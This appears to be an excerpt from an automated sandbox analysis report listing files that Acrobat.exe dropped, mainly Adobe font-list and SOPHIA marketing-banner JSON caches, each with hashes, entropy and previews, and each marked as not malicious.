                                                                                  Preview:%!Adobe-FontList 1.23.%Locale:0x809..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:Identity-H.Registry:Adobe.Ordering:Identity.OutlineFileName:C:\Program Files\Adobe\Acrobat DC\Resource\CMap\Identity-H.FileLength:8228.FileModTime:1612212568.%EndFont..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:Identity-V.Registry:Adobe.Ordering:Identity.UseCMap:Identity-H.OutlineFileName:C:\Program Files\Adobe\Acrobat DC\Resource\CMap\Identity-V.FileLength:2761.FileModTime:1612212568.%EndFont..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:UCS2-GBK-EUC.Registry:Adobe.Ordering:UCS2_GBK_EUC.OutlineFileName:C:\Program Files\Adobe\Acrobat DC\Resource\CMap\UCS2-GBK-EUC.FileLength:243835.FileModTime:1612212568.%EndFont..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:UniKS-UTF16-H.Registry:Adobe.Ordering:Korea1.OutlineFileName:C:\Program Files\Adobe\Acrobat DC\Resource\CMap\UniKS-UTF16-H.FileLength:131902.FileModTime:1612212568.%EndFont..%BeginFont.Handler:D

                                                                                  C:\Users\user\AppData\Local\Adobe\Acrobat\DC\Cache\AdobeFnt23.lst.5264

                                                                                  Download File
                                                                                  Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                  File Type:PostScript document text
                                                                                  Category:dropped
                                                                                  Size (bytes):10880
                                                                                  Entropy (8bit):5.214360287289079
                                                                                  Encrypted:false
                                                                                  SSDEEP:192:SgAYm4DAv6oq6oCf6ocL6oz6o46ok6o16ok6oKls6oVtfZ6ojtou6o2ti16oGwX/:SV548vvqvSvivzv4vkv1vkvKlsvVtfZp
                                                                                  MD5:B60EE534029885BD6DECA42D1263BDC0
                                                                                  SHA1:4E801BA6CA503BDAE7E54B7DB65BE641F7C23375
                                                                                  SHA-256:B5F094EFF25215E6C35C46253BA4BB375BC29D055A3E90E08F66A6FDA1C35856
                                                                                  SHA-512:52221F919AEA648B57E567947806F71922B604F90AC6C8805E5889AECB131343D905D94703EA2B4CEC9B0C1813DDA6EAE2677403F58D3B340099461BBCD355AE
                                                                                  Malicious:false
                                                                                  Preview:%!Adobe-FontList 1.23.%Locale:0x809..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:Identity-H.Registry:Adobe.Ordering:Identity.OutlineFileName:C:\Program Files\Adobe\Acrobat DC\Resource\CMap\Identity-H.FileLength:8228.FileModTime:1612212568.%EndFont..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:Identity-V.Registry:Adobe.Ordering:Identity.UseCMap:Identity-H.OutlineFileName:C:\Program Files\Adobe\Acrobat DC\Resource\CMap\Identity-V.FileLength:2761.FileModTime:1612212568.%EndFont..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:UCS2-GBK-EUC.Registry:Adobe.Ordering:UCS2_GBK_EUC.OutlineFileName:C:\Program Files\Adobe\Acrobat DC\Resource\CMap\UCS2-GBK-EUC.FileLength:243835.FileModTime:1612212568.%EndFont..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:UniKS-UTF16-H.Registry:Adobe.Ordering:Korea1.OutlineFileName:C:\Program Files\Adobe\Acrobat DC\Resource\CMap\UniKS-UTF16-H.FileLength:131902.FileModTime:1612212568.%EndFont..%BeginFont.Handler:D

                                                                                  C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\ACROBAT_READER_MASTER_SURFACEID

                                                                                  Download File
                                                                                  Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                  File Type:JSON data
                                                                                  Category:dropped
                                                                                  Size (bytes):295
                                                                                  Entropy (8bit):5.387344511906008
                                                                                  Encrypted:false
                                                                                  SSDEEP:6:YEQXJ2HX51IZWwz2kVoZcg1vRcR0YMzoAvJM3g98kUwPeUkwRe9:YvXKXnWz2lZc0vR8GMbLUkee9
                                                                                  MD5:4EE4463D74466A9C0E6F23B1DC602313
                                                                                  SHA1:47F49F31354090A81D926E8269ED0A3EDD8D4D43
                                                                                  SHA-256:8BB8283410A88AC8EBAEB62DDE48A7C1C0DC3729C370B701621FEE3C523D4EBC
                                                                                  SHA-512:7D6118EDAEF43B847D7DA34CBDDBFFB9BFD7A5CEEF7D52E7384911049ECD137C64BB036AE5D02D3BDE358819C924A48954C52025CA83460184422A522013B478
                                                                                  Malicious:false
                                                                                  Preview:{"analyticsData":{"responseGUID":"b04cb679-ce63-45bf-9a11-f33e0f931d88","sophiaUUID":"BB455677-E4C2-45EB-A908-4974DBA96F4C"},"encodingScheme":true,"expirationDTS":1737020758250,"statusCode":200,"surfaceID":"ACROBAT_READER_MASTER_SURFACEID","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}

                                                                                  C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_FirstMile_Home_View_Surface

                                                                                  Download File
                                                                                  Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                  File Type:JSON data
                                                                                  Category:dropped
                                                                                  Size (bytes):294
                                                                                  Entropy (8bit):5.33561183963747
                                                                                  Encrypted:false
                                                                                  SSDEEP:6:YEQXJ2HX51IZWwz2kVoZcg1vRcR0YMzoAvJfBoTfXpnrPeUkwRe9:YvXKXnWz2lZc0vR8GWTfXcUkee9
                                                                                  MD5:4ADE3C368B04530A14386AB48A6B7855
                                                                                  SHA1:5DE6B7DCA004958046688A50CA6820BADF96E3CE
                                                                                  SHA-256:AA22E7B74040B819469FFEEE2E076FFE48EA8EB093966E29844E79B163018C52
                                                                                  SHA-512:55BF634DC3CC0AEE3B7002E25501D76BD50CDCB2FC6A1D3EB20A6C96287570BEF75AAB849580478864A96D3EFE3763CC14CDFD1E8FC9129DE94783DDE0F5D6DC
                                                                                  Malicious:false
                                                                                  Preview:{"analyticsData":{"responseGUID":"b04cb679-ce63-45bf-9a11-f33e0f931d88","sophiaUUID":"BB455677-E4C2-45EB-A908-4974DBA96F4C"},"encodingScheme":true,"expirationDTS":1737020758250,"statusCode":200,"surfaceID":"DC_FirstMile_Home_View_Surface","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}

                                                                                  C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_FirstMile_Right_Sec_Surface

                                                                                  Download File
                                                                                  Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                  File Type:JSON data
                                                                                  Category:dropped
                                                                                  Size (bytes):294
                                                                                  Entropy (8bit):5.314160156163474
                                                                                  Encrypted:false
                                                                                  SSDEEP:6:YEQXJ2HX51IZWwz2kVoZcg1vRcR0YMzoAvJfBD2G6UpnrPeUkwRe9:YvXKXnWz2lZc0vR8GR22cUkee9
                                                                                  MD5:3D6375F8BD167A44D7B4A0CE9105799B
                                                                                  SHA1:75A2D387E7BBACA45F60A96E2E073416AC5D378E
                                                                                  SHA-256:FAE5CF179682F593ECE90A4A98B2FA39F1C65D21A00A1E06C25B6800FDEB7CA5
                                                                                  SHA-512:30EE71CE426A623F186FD85E805C5E0A30ECDABC880EF02C775C8D93E5E4D1F84FF88C6DF464AA35800F28D6B841A2E462D5392F39F045EDD9D9C46E7679C534
                                                                                  Malicious:false
                                                                                  Preview:{"analyticsData":{"responseGUID":"b04cb679-ce63-45bf-9a11-f33e0f931d88","sophiaUUID":"BB455677-E4C2-45EB-A908-4974DBA96F4C"},"encodingScheme":true,"expirationDTS":1737020758250,"statusCode":200,"surfaceID":"DC_FirstMile_Right_Sec_Surface","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}

                                                                                  C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_READER_LAUNCH_CARD

                                                                                  Download File
                                                                                  Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                  File Type:JSON data
                                                                                  Category:dropped
                                                                                  Size (bytes):285
                                                                                  Entropy (8bit):5.3751964611042835
                                                                                  Encrypted:false
                                                                                  SSDEEP:6:YEQXJ2HX51IZWwz2kVoZcg1vRcR0YMzoAvJfPmwrPeUkwRe9:YvXKXnWz2lZc0vR8GH56Ukee9
                                                                                  MD5:1090C0F3119977CECF5D9B12D7E17558
                                                                                  SHA1:1B4AEB2216FBC62D412EB25C77395153720075EA
                                                                                  SHA-256:80E80987D518CA9619B7BCEAC79D2B1AE6AFF98CDF9CC3BAA088C80F21BF7056
                                                                                  SHA-512:FE4F4D860095836142974D0B2BF61C7BA4BF3A1228F1FBFDAF6D4972B54C573F7FC6831B9AC381FCDA7FA7D864F810403C391DC3C79166E5225DA72BC64E6449
                                                                                  Malicious:false
                                                                                  Preview:{"analyticsData":{"responseGUID":"b04cb679-ce63-45bf-9a11-f33e0f931d88","sophiaUUID":"BB455677-E4C2-45EB-A908-4974DBA96F4C"},"encodingScheme":true,"expirationDTS":1737020758250,"statusCode":200,"surfaceID":"DC_READER_LAUNCH_CARD","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}

                                                                                  C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_Convert_LHP_Banner

                                                                                  Download File
                                                                                  Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                  File Type:JSON data
                                                                                  Category:dropped
                                                                                  Size (bytes):1123
                                                                                  Entropy (8bit):5.6923656523064965
                                                                                  Encrypted:false
                                                                                  SSDEEP:24:Yv6XWYzvrpLgE9cQx8LennAvzBvkn0RCmK8czOCCSE:YvHgjhgy6SAFv5Ah8cv/E
                                                                                  MD5:075429869FA36E48E41BE9F1AE59EF08
                                                                                  SHA1:09F477049679BBFCE9ED85D1112FB35D7FEE7B2D
                                                                                  SHA-256:1D709A6A2187371CBA873E8338C406F1EBB1EA92808632ED7177A18236F02FBE
                                                                                  SHA-512:F51FE1676D2F3B0755332C29D26A849DA3711ECA9EE2026F323991C3DB0D8013918C1B3D17AC725D2D186B7CC5F140562A122F470997084A2A437D87033F657A
                                                                                  Malicious:false
                                                                                  Preview:{"analyticsData":{"responseGUID":"b04cb679-ce63-45bf-9a11-f33e0f931d88","sophiaUUID":"BB455677-E4C2-45EB-A908-4974DBA96F4C"},"encodingScheme":true,"expirationDTS":1737020758250,"statusCode":200,"surfaceID":"DC_Reader_Convert_LHP_Banner","surfaceObj":{"SurfaceAnalytics":{"surfaceId":"DC_Reader_Convert_LHP_Banner"},"containerMap":{"1":{"containerAnalyticsData":{"actionBlockId":"93365_289436ActionBlock_1","campaignId":93365,"containerId":"1","controlGroupId":"","treatmentId":"d5bba1ae-6009-4d23-8886-fd4a474b8ac9","variationId":"289436"},"containerId":1,"containerLabel":"JSON for DC_Reader_Convert_LHP_Banner","content":{"data":"eyJjdGEiOnsidGV4dCI6IkZyZWUgdHJpYWwiLCJjbGljayI6Im9wZW5Ub29sIiwidG9vbF9pZCI6IkNvbnZlcnRQREZSZHJSSFBBcHAifSwidWkiOnsidGl0bGVfc3R5bGluZyI6eyJmb250X3NpemUiOiIxNHB4IiwiZm9udF9zdHlsZSI6IjAifSwiZGVzY3JpcHRpb25fc3R5bGluZyI6eyJmb250X3NpemUiOiIxMnB4IiwiZm9udF9zdHlsZSI6Ii0xIn0sInRpdGxlIjpudWxsLCJkZXNjcmlwdGlvbiI6IkV4cG9ydCBQREZzIHRvIE1pY3Jvc29mdCBXb3JkIGFuZCBFeGNlbC4ifSwidGNh

                                                                                  C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_Disc_LHP_Banner

                                                                                  Download File
                                                                                  Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                  File Type:JSON data
                                                                                  Category:dropped
                                                                                  Size (bytes):289
                                                                                  Entropy (8bit):5.322506866083763
                                                                                  Encrypted:false
                                                                                  SSDEEP:6:YEQXJ2HX51IZWwz2kVoZcg1vRcR0YMzoAvJf8dPeUkwRe9:YvXKXnWz2lZc0vR8GU8Ukee9
                                                                                  MD5:A2951D0B66E741A5BF44CE7788AD0C5E
                                                                                  SHA1:C2B602E7EF26BA449BD7A3EAC517692037C88610
                                                                                  SHA-256:CF258CDB13E291FD612907E332E653FD25D0B21F81D893842805631E41FE8935
                                                                                  SHA-512:A9E7FD8B4335896CD533F9F008A77D65E3147C22FF6FBB2B4B6E741C537C41A2F810767CD02E2CD72F7188B2DAFB9736383A3D970BEA018CCF09A6D329E8D78F
                                                                                  Malicious:false
                                                                                  Preview:{"analyticsData":{"responseGUID":"b04cb679-ce63-45bf-9a11-f33e0f931d88","sophiaUUID":"BB455677-E4C2-45EB-A908-4974DBA96F4C"},"encodingScheme":true,"expirationDTS":1737020758250,"statusCode":200,"surfaceID":"DC_Reader_Disc_LHP_Banner","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}

                                                                                  C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_Disc_LHP_Retention

                                                                                  Download File
                                                                                  Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                  File Type:JSON data
                                                                                  Category:dropped
                                                                                  Size (bytes):292
                                                                                  Entropy (8bit):5.3258672694011295
                                                                                  Encrypted:false
                                                                                  SSDEEP:6:YEQXJ2HX51IZWwz2kVoZcg1vRcR0YMzoAvJfQ1rPeUkwRe9:YvXKXnWz2lZc0vR8GY16Ukee9
                                                                                  MD5:7CC424A0C5040A683CE79D4A9BABFC71
                                                                                  SHA1:59986AC93B463B128700F83CA2CC7C6793F2B7C9
                                                                                  SHA-256:CE6148D28936018D524ACE0AB832CA79C45DDB1BF8843D3BCBFD8A1019D3D706
                                                                                  SHA-512:18AB190E7684C5EF646A2A1348A79B4E548D7911E9D1159E59A13A596066CC498354DAB80BDFC94F42507F2F97F7480115CB34361ED1FE91B5601ECD3615FDBC
                                                                                  Malicious:false
                                                                                  Preview:{"analyticsData":{"responseGUID":"b04cb679-ce63-45bf-9a11-f33e0f931d88","sophiaUUID":"BB455677-E4C2-45EB-A908-4974DBA96F4C"},"encodingScheme":true,"expirationDTS":1737020758250,"statusCode":200,"surfaceID":"DC_Reader_Disc_LHP_Retention","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}

                                                                                  C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_Edit_LHP_Banner

                                                                                  Download File
                                                                                  Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                  File Type:JSON data
                                                                                  Category:dropped
                                                                                  Size (bytes):289
                                                                                  Entropy (8bit):5.332815119883226
                                                                                  Encrypted:false
                                                                                  SSDEEP:6:YEQXJ2HX51IZWwz2kVoZcg1vRcR0YMzoAvJfFldPeUkwRe9:YvXKXnWz2lZc0vR8Gz8Ukee9
                                                                                  MD5:23384391B8175FF3C2AED38E4082173C
                                                                                  SHA1:F60B4E7FCDE817ED43F65A495BA4BDC584AC2D23
                                                                                  SHA-256:4CAC5464B5429C20FB6E12CE76D1761AEF0E7F303E9FF390BC4D20AE67631F5B
                                                                                  SHA-512:7EC316682DD64B38C37E993CA946DB2AF271BAB441AF753D7BC3AEB09A30A77C5533F18973FD5E98840E654EB87E9C2D4B5FDDDA44D0D1D630B4D2E24CBBA9FB
                                                                                  Malicious:false
                                                                                  Preview:{"analyticsData":{"responseGUID":"b04cb679-ce63-45bf-9a11-f33e0f931d88","sophiaUUID":"BB455677-E4C2-45EB-A908-4974DBA96F4C"},"encodingScheme":true,"expirationDTS":1737020758250,"statusCode":200,"surfaceID":"DC_Reader_Edit_LHP_Banner","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}

                                                                                  C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_Home_LHP_Trial_Banner

                                                                                  Download File
                                                                                  Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                  File Type:JSON data
                                                                                  Category:dropped
                                                                                  Size (bytes):295
                                                                                  Entropy (8bit):5.34785608324787
                                                                                  Encrypted:false
                                                                                  SSDEEP:6:YEQXJ2HX51IZWwz2kVoZcg1vRcR0YMzoAvJfzdPeUkwRe9:YvXKXnWz2lZc0vR8Gb8Ukee9
                                                                                  MD5:CCDBE525D4E39B62A5951A954C9FAD0E
                                                                                  SHA1:EF0760005AA2FC3D5B27AFE6102B1CCCD66AE426
                                                                                  SHA-256:A0506E3BD80906737EE2A2DAF80978CD4634A9F00901416EA3B90D7B23A942F9
                                                                                  SHA-512:825DAEE2030E76F8F8C653B882758996BA97F6CA2A9D3ACE317457900939FC098BB8A8424CF10EDFB83E6160EBEEF48E39DF4A336A510C708657CA96F326E7E4
                                                                                  Malicious:false
                                                                                  Preview:{"analyticsData":{"responseGUID":"b04cb679-ce63-45bf-9a11-f33e0f931d88","sophiaUUID":"BB455677-E4C2-45EB-A908-4974DBA96F4C"},"encodingScheme":true,"expirationDTS":1737020758250,"statusCode":200,"surfaceID":"DC_Reader_Home_LHP_Trial_Banner","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}

                                                                                  C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_More_LHP_Banner

                                                                                  Download File
                                                                                  Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                  File Type:JSON data
                                                                                  Category:dropped
                                                                                  Size (bytes):289
                                                                                  Entropy (8bit):5.328797546957633
                                                                                  Encrypted:false
                                                                                  SSDEEP:6:YEQXJ2HX51IZWwz2kVoZcg1vRcR0YMzoAvJfYdPeUkwRe9:YvXKXnWz2lZc0vR8Gg8Ukee9
                                                                                  MD5:65C55CB2D598C9DC4BCEEB50652C754E
                                                                                  SHA1:172640A947A03E64C5329BC46BAB336FAC157736
                                                                                  SHA-256:01892154E41D6FA9BBB3A405A7CE92CC973E0B5A77763538CBB144FC367B02B1
                                                                                  SHA-512:A116902652CFE87EB0933B4F1973809EF421797E9E9E4CC440316062F3227A9505AA5CB54E43831470C9BA7D5ADE574CAFD6DD7BDA9AA87480D070DA3AB81702
                                                                                  Malicious:false
                                                                                  Preview:{"analyticsData":{"responseGUID":"b04cb679-ce63-45bf-9a11-f33e0f931d88","sophiaUUID":"BB455677-E4C2-45EB-A908-4974DBA96F4C"},"encodingScheme":true,"expirationDTS":1737020758250,"statusCode":200,"surfaceID":"DC_Reader_More_LHP_Banner","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}

                                                                                  C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_RHP_Banner

                                                                                  Download File
                                                                                  Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                  File Type:JSON data
                                                                                  Category:dropped
                                                                                  Size (bytes):284
                                                                                  Entropy (8bit):5.315653909774302
                                                                                  Encrypted:false
                                                                                  SSDEEP:6:YEQXJ2HX51IZWwz2kVoZcg1vRcR0YMzoAvJf+dPeUkwRe9:YvXKXnWz2lZc0vR8G28Ukee9
                                                                                  MD5:86277AEF80D0C93B17EA0690D6F258C7
                                                                                  SHA1:29DCCC958761350EB78FBCF2EE1A9473F5352E6D
                                                                                  SHA-256:6EA6B7789859176D408FF903495ED0F80AE6CCD6502CD5A85C6D9B6B014FB23A
                                                                                  SHA-512:0BED165FFAF1CF2686DAF51F70D5069C83A0A53D90AB4CF9A63967FB442715C86A4F4AE3AA9DDE0BDC762341CDFBD1B7EFC6E79D2D69A11D24CB89ABEFFE143D
                                                                                  Malicious:false
                                                                                  Preview:{"analyticsData":{"responseGUID":"b04cb679-ce63-45bf-9a11-f33e0f931d88","sophiaUUID":"BB455677-E4C2-45EB-A908-4974DBA96F4C"},"encodingScheme":true,"expirationDTS":1737020758250,"statusCode":200,"surfaceID":"DC_Reader_RHP_Banner","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}

                                                                                  C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_RHP_Intent_Banner

                                                                                  Download File
                                                                                  Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                  File Type:JSON data
                                                                                  Category:dropped
                                                                                  Size (bytes):291
                                                                                  Entropy (8bit):5.312146723346563
                                                                                  Encrypted:false
                                                                                  SSDEEP:6:YEQXJ2HX51IZWwz2kVoZcg1vRcR0YMzoAvJfbPtdPeUkwRe9:YvXKXnWz2lZc0vR8GDV8Ukee9
                                                                                  MD5:612E8DDA9AE2EFD08D317B763D743F77
                                                                                  SHA1:F88393548E5C3690E92F0E56EFDFA2ACFDA0D0F2
                                                                                  SHA-256:83EEB584A828A8B0DB78C574868FF642E0E01E4898324884A7488B2A716A85E6
                                                                                  SHA-512:9AD853545FF7D10AD72D3813B2283B0B209034973D2545F29866E62014F37833D97C92E99FD4D40A9397DC61BC56A781503D87172E8737E09D189F52FE5C0290
                                                                                  Malicious:false
                                                                                  Preview:{"analyticsData":{"responseGUID":"b04cb679-ce63-45bf-9a11-f33e0f931d88","sophiaUUID":"BB455677-E4C2-45EB-A908-4974DBA96F4C"},"encodingScheme":true,"expirationDTS":1737020758250,"statusCode":200,"surfaceID":"DC_Reader_RHP_Intent_Banner","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}

                                                                                  C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_RHP_Retention

                                                                                  Download File
                                                                                  Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                  File Type:JSON data
                                                                                  Category:dropped
                                                                                  Size (bytes):287
                                                                                  Entropy (8bit):5.316882396426367
                                                                                  Encrypted:false
                                                                                  SSDEEP:6:YEQXJ2HX51IZWwz2kVoZcg1vRcR0YMzoAvJf21rPeUkwRe9:YvXKXnWz2lZc0vR8G+16Ukee9
                                                                                  MD5:D823699CB2C3F2BBC0D163E34D52030A
                                                                                  SHA1:1194DAF4A2895B2801D257081C243230B616F945
                                                                                  SHA-256:2C6C3A1B2DB0AD2A125F4DBBBB104F56ADF308D366717A475181C7153C178FC6
                                                                                  SHA-512:E1493253398D490179E124F4D27933E6A42B163269F590911261DF8E84C8C87CB718FBCFF5E05C18128D9E15E2E3F227AEAD4A73793713D43603F3703B773087
                                                                                  Malicious:false
                                                                                  Preview:{"analyticsData":{"responseGUID":"b04cb679-ce63-45bf-9a11-f33e0f931d88","sophiaUUID":"BB455677-E4C2-45EB-A908-4974DBA96F4C"},"encodingScheme":true,"expirationDTS":1737020758250,"statusCode":200,"surfaceID":"DC_Reader_RHP_Retention","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}

                                                                                  C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_Sign_LHP_Banner

                                                                                  Download File
                                                                                  Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                  File Type:JSON data
                                                                                  Category:dropped
                                                                                  Size (bytes):1090
                                                                                  Entropy (8bit):5.669409110956702
                                                                                  Encrypted:false
                                                                                  SSDEEP:24:Yv6XWYzvLamXayLgE+cNDxeNaqnAvz7xHn0RCmK8czOC/BSE:YvHgDBgkDMUJUAh8cvME
                                                                                  MD5:44817AF832CB89E5948756A934B0101B
                                                                                  SHA1:88B4D56058513EC928BEC0EDC88CA7A007FEEEFE
                                                                                  SHA-256:8E1779B113047EEA15646DC8451C2E7829981B28539E14639AD7F1AF1D9AE834
                                                                                  SHA-512:4021C5A25321192E119EBAD3CC78DB28968113C8D45BE1B916110F4F3C828102C8C5DCDA345DE68F5452149A1D4193A4234E290FCB501BCF5E96C1F82C69068D
                                                                                  Malicious:false
                                                                                  Preview:{"analyticsData":{"responseGUID":"b04cb679-ce63-45bf-9a11-f33e0f931d88","sophiaUUID":"BB455677-E4C2-45EB-A908-4974DBA96F4C"},"encodingScheme":true,"expirationDTS":1737020758250,"statusCode":200,"surfaceID":"DC_Reader_Sign_LHP_Banner","surfaceObj":{"SurfaceAnalytics":{"surfaceId":"DC_Reader_Sign_LHP_Banner"},"containerMap":{"1":{"containerAnalyticsData":{"actionBlockId":"93365_289436ActionBlock_0","campaignId":93365,"containerId":"1","controlGroupId":"","treatmentId":"266234d2-130d-426e-8466-c7a061db101f","variationId":"289436"},"containerId":1,"containerLabel":"JSON for DC_Reader_Sign_LHP_Banner","content":{"data":"eyJjdGEiOnsidGV4dCI6IkZyZWUgdHJpYWwiLCJjbGljayI6Im9wZW5Ub29sIiwidG9vbF9pZCI6IlVwZ3JhZGVSSFBSZHJBcHAifSwidWkiOnsidGl0bGVfc3R5bGluZyI6eyJmb250X3NpemUiOiIxNHB4IiwiZm9udF9zdHlsZSI6IjAifSwiZGVzY3JpcHRpb25fc3R5bGluZyI6eyJmb250X3NpemUiOiIxMnB4IiwiZm9udF9zdHlsZSI6Ii0xIn0sInRpdGxlIjpudWxsLCJkZXNjcmlwdGlvbiI6IkVhc2lseSBmaWxsIGFuZCBzaWduIFBERnMuIn0sInRjYXRJZCI6bnVsbH0=","dataType":"app

                                                                                  C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_Upsell_Cards

                                                                                  Download File
                                                                                  Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                  File Type:JSON data
                                                                                  Category:dropped
                                                                                  Size (bytes):286
                                                                                  Entropy (8bit):5.293955228899736
                                                                                  Encrypted:false
                                                                                  SSDEEP:6:YEQXJ2HX51IZWwz2kVoZcg1vRcR0YMzoAvJfshHHrPeUkwRe9:YvXKXnWz2lZc0vR8GUUUkee9
                                                                                  MD5:F601BE5940B8916207E05ED4F6A84462
                                                                                  SHA1:FDA4B40E66EAF2E2FFCC6362225B0F0BA7F5F7C3
                                                                                  SHA-256:5A18FC0627F696CADBFAF86E1D3B7F1B6CE77ACF3A02CA5B4D559446AD831929
                                                                                  SHA-512:9BA1F310F07B04E2189544060CFEFD3419F4701A6215C9F2D3153EEADBB2404969AF26DA47875810F68E55A6487EF53CE6CCF86614F8746EED06CFAE40CCBA07
                                                                                  Malicious:false
                                                                                  Preview:{"analyticsData":{"responseGUID":"b04cb679-ce63-45bf-9a11-f33e0f931d88","sophiaUUID":"BB455677-E4C2-45EB-A908-4974DBA96F4C"},"encodingScheme":true,"expirationDTS":1737020758250,"statusCode":200,"surfaceID":"DC_Reader_Upsell_Cards","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}

                                                                                  C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\Edit_InApp_Aug2020

                                                                                  Download File
                                                                                  Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                  File Type:JSON data
                                                                                  Category:dropped
                                                                                  Size (bytes):282
                                                                                  Entropy (8bit):5.300707545026204
                                                                                  Encrypted:false
                                                                                  SSDEEP:6:YEQXJ2HX51IZWwz2kVoZcg1vRcR0YMzoAvJTqgFCrPeUkwRe9:YvXKXnWz2lZc0vR8GTq16Ukee9
                                                                                  MD5:D9D610A812DDF8005B00C22326DFE9DA
                                                                                  SHA1:774C3A0980F72B11C88D8ACC9A07A90A8D57C9C8
                                                                                  SHA-256:DA2FE52DD53EB0985CCB5B48A3309C06F5738CB40424126A2AF2C1F4756CB44A
                                                                                  SHA-512:EA44AC7773FAF5F5CF5242F7BD72579655DFF6A642EC4FE15018302844F9448B2287245FCCD4759D14982C2A3908A0BB84A590C3B27337BF022BEB6404C22BDF
                                                                                  Malicious:false
                                                                                  Preview:{"analyticsData":{"responseGUID":"b04cb679-ce63-45bf-9a11-f33e0f931d88","sophiaUUID":"BB455677-E4C2-45EB-A908-4974DBA96F4C"},"encodingScheme":true,"expirationDTS":1737020758250,"statusCode":200,"surfaceID":"Edit_InApp_Aug2020","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}

                                                                                  C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\TESTING

                                                                                  Download File
                                                                                  Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                  File Type:data
                                                                                  Category:dropped
                                                                                  Size (bytes):4
                                                                                  Entropy (8bit):0.8112781244591328
                                                                                  Encrypted:false
                                                                                  SSDEEP:3:e:e
                                                                                  MD5:DC84B0D741E5BEAE8070013ADDCC8C28
                                                                                  SHA1:802F4A6A20CBF157AAF6C4E07E4301578D5936A2
                                                                                  SHA-256:81FF65EFC4487853BDB4625559E69AB44F19E0F5EFBD6D5B2AF5E3AB267C8E06
                                                                                  SHA-512:65D5F2A173A43ED2089E3934EB48EA02DD9CCE160D539A47D33A616F29554DBD7AF5D62672DA1637E0466333A78AAA023CBD95846A50AC994947DC888AB6AB71
                                                                                  Malicious:false
                                                                                  Preview:....

                                                                                  C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\SOPHIA.json

                                                                                  Download File
                                                                                  Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                  File Type:JSON data
                                                                                  Category:dropped
                                                                                  Size (bytes):2814
                                                                                  Entropy (8bit):5.136197537493457
                                                                                  Encrypted:false
                                                                                  SSDEEP:24:YU/IZataaynVxU1Ps1/sTCR5QwbnJj3j0uj0SiicC+2SF2LS8Cyyp2arBZ5qv9hf:Y8OVEPs1/sYjhBulvF6mp1vg9wY
